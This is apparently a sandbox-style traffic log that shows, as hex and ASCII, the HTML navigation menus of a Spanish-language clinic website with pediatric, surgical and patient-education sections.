                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2910INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
                                                                                                                                                                                                                                                        Data Ascii: <i class="fab fa-instagram"></i> </a> </li> </ul> </div> </div> <div c
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2911INData Raw: 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 62 6f 74 74 6f 6d 2d 68 65 61 64 65 72 20 70 71 2d 68 61 73 2d 73 74 69 63 6b 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 63 75 73 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32
                                                                                                                                                                                                                                                        Data Ascii: /ul> </div> </div> </div> </div> </div> <div class="pq-bottom-header pq-has-sticky"> <div class="container-custom"> <div class="row"> <div class="col-lg-12
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2913INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 6d 69 73 69 6f 6e 2d 79 2d 76 69 73 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4d 69 73 69 c3 b3 6e 20 79 20 56 69 73 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="nosotros/mision-y-vision" target="_self">Misin y Visin</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2914INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 67 6f 62 69 65 72 6e 6f 2d 63 6f 72 70 6f 72 61 74 69 76 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 47 6f 62 69 65 72 6e 6f 20 43 6f 72 70 6f 72 61 74 69 76 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="nosotros/gobierno-corporativo" target="_self">Gobierno Corporativo</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2915INData Raw: 22 6e 6f 73 6f 74 72 6f 73 2f 66 75 6e 64 61 63 69 6f 6e 2d 73 61 6e 2d 6c 75 69 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 46 75 6e 64 61 63 69 c3 b3 6e 20 53 61 6e 20 4c 75 69 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e
                                                                                                                                                                                                                                                        Data Ascii: "nosotros/fundacion-san-luis" target="_self">Fundacin San Luis</a></li> </ul> </li> <li class="menu-item "> <a tabin
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2917INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 69 6e 66 65 63 74 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 49 6e 66 65 63 74 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="especialidades/pediatricas/infectologia" target="_self">Infectologa</a></li> <li class="menu
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2918INData Raw: 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 72 61 64 69 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 52 61 64 69 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69
                                                                                                                                                                                                                                                        Data Ascii: lass="menu-item "><a href="especialidades/pediatricas/radiologia" target="_self">Radiologa</a></li> <li class="menu-item "><a href="especiali
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2919INData Raw: 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 6e 65 75 6d 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 65 75 6d 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ="especialidades/pediatricas/neumologia" target="_self">Neumologa</a></li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2921INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 6d 65 67 61 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 30 3e 20 53 65 72 76 69 63 69 6f 73 3c 2f 61 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62
                                                                                                                                                                                                                                                        Data Ascii: </ul> </li> <li class="menu-item mega-menu"> <a tabindex=0> Servicios</a><i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2922INData Raw: 22 5f 73 65 6c 66 22 3e 4c 61 70 61 72 6f 73 63 c3 b3 70 69 63 61 20 65 20 68 69 73 74 65 72 6f 73 63 c3 b3 70 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 63 61 72 64 69 6f 76 61 73 63 75 6c 61 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 61 72 64 69 6f 76 61 73 63 75 6c
                                                                                                                                                                                                                                                        Data Ascii: "_self">Laparoscpica e histeroscpica</a></li> <li class="menu-item "><a href="servicios/cirugia/cardiovascular" target="_self">Cardiovascul
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2923INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 70 65 64 69 61 74 72 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/cirugia/pediatrica" target="_self">Peditrica</a></li> <li class="menu-item "><a hre
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2925INData Raw: 6f 73 2d 6f 64 6f 6e 74 6f 6c 6f 67 69 63 6f 73 2d 62 61 6a 6f 2d 61 6e 65 73 74 65 73 69 61 2d 67 65 6e 65 72 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f 63 65 64 69 6d 69 65 6e 74 6f 73 20 6f 64 6f 6e 74 6f 6c c3 b3 67 69 63 6f 73 20 62 61 6a 6f 20 61 6e 65 73 74 65 73 69 61 20 67 65 6e 65 72 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c
                                                                                                                                                                                                                                                        Data Ascii: os-odontologicos-bajo-anestesia-general" target="_self">Procedimientos odontolgicos bajo anestesia general</a></li> </ul> </l
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2926INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 75 6e 69 64 61 64 2d 64 65 2d 68 65 6d 61 74 6f 2d 6f 6e 63 6f 6c 6f 67 69 61 2d 70 65 64 69 61 74 72 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 55 6e 69 64 61 64 20 64 65 20 68 65 6d 61 74 6f 20 e2 80 93 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 20 70 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/unidad-de-hemato-oncologia-pediatrica" target="_self">Unidad de hemato oncologa peditrica</a></l
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2927INData Raw: 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 73 65 72 76 69 63 69 6f 2d 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 65 72 76 69 63 69 6f 20 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61
                                                                                                                                                                                                                                                        Data Ascii: os/apoyo-diagnostico/servicio-transfusional" target="_self">Servicio transfusional</a></li> <li class="menu-item "><a href="servicios/apoyo-dia
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2929INData Raw: 54 61 63 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 70 72 6f 63 65 64 69 6d 69 65 6e 74 6f 2d 64 65 2d 6d 65 64 69 63 69 6e 61 2d 6d 61 74 65 72 6e 6f 2d 66 65 74 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f 63 65 64 69 6d 69 65 6e 74 6f 20
                                                                                                                                                                                                                                                        Data Ascii: Tac</a></li> <li class="menu-item "><a href="servicios/apoyo-diagnostico/procedimiento-de-medicina-materno-fetal" target="_self">Procedimiento
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2930INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 74 65 72 61 70 69 61 2f 6f 63 75 70 61 63 69 6f 6e 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4f 63 75 70 61 63 69 6f 6e 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/terapia/ocupacional" target="_self">Ocupacional</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2931INData Raw: 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 6c 61 6e 69 66 69 63 61 63 69 c3 b3 6e 20 66 61 6d 69 6c 69 61 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 75 72 73 6f 2d 70 73 69 63 6f 70 72 6f 66 69 6c 61 63 74 69 63 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 75 72 73 6f 20 50 73 69 63 6f
                                                                                                                                                                                                                                                        Data Ascii: target="_self">Planificacin familiar</a></li> <li class="menu-item "><a href="servicios/curso-psicoprofilactico" target="_self">Curso Psico
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2933INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 6d 65 64 69 63 69 6e 61 2d 66 69 73 69 63 61 2d 79 2d 72 65 68 61 62 69 6c 69 74 61 63 69 6f 6e 2f 6e 65 75 72 6f 63 6f 6e 64 75 63 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 65 75 72 6f 63 6f 6e 64 75 63 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/medicina-fisica-y-rehabilitacion/neuroconduccion" target="_self">Neuroconduccin</a></li> </u
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2934INData Raw: 38 30 30 30 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 30 3e 20 45 64 75 63 61 63 69 c3 b3 6e 20 61 6c 20 70 61 63 69 65 6e 74 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: 8000 <a tabindex=0> Educacin al paciente</a> <i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub-menu">
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2935INData Raw: 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 49 41 4d 49 49 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 70 72 6f 67 72 61 6d 61 2d 6d 61 6d 61 2d 63 61 6e 67 75 72 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f
                                                                                                                                                                                                                                                        Data Ascii: target="_self">IAMII</a></li> <li class="menu-item "><a href="pacientes/educacion-al-paciente/programa-mama-canguro" target="_self">Pro
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2937INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 48 65 6d 61 74 6f 20 e2 80 93 20 4f 6e 63 6f 6c 6f 67 c3 ad 61 20 70 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 76 61 63 75 6e 61 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: target="_self">Hemato Oncologa peditrica</a></li> <li class="menu-item "><a href="pacientes/educacion-al-paciente/vacunacion"
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2938INData Raw: 6c 66 22 3e 43 75 6f 74 61 20 6d 6f 64 65 72 61 64 6f 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 3e 20 50 75 62 6c 69 63 61 63 69 6f 6e 65 73 3c 2f 61 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: lf">Cuota moderadora</a></li> </ul> </li> <li class="menu-item "> <a href=publicaciones> Publicaciones</a><i class="fa fa-chevron-down pq-submenu-icon
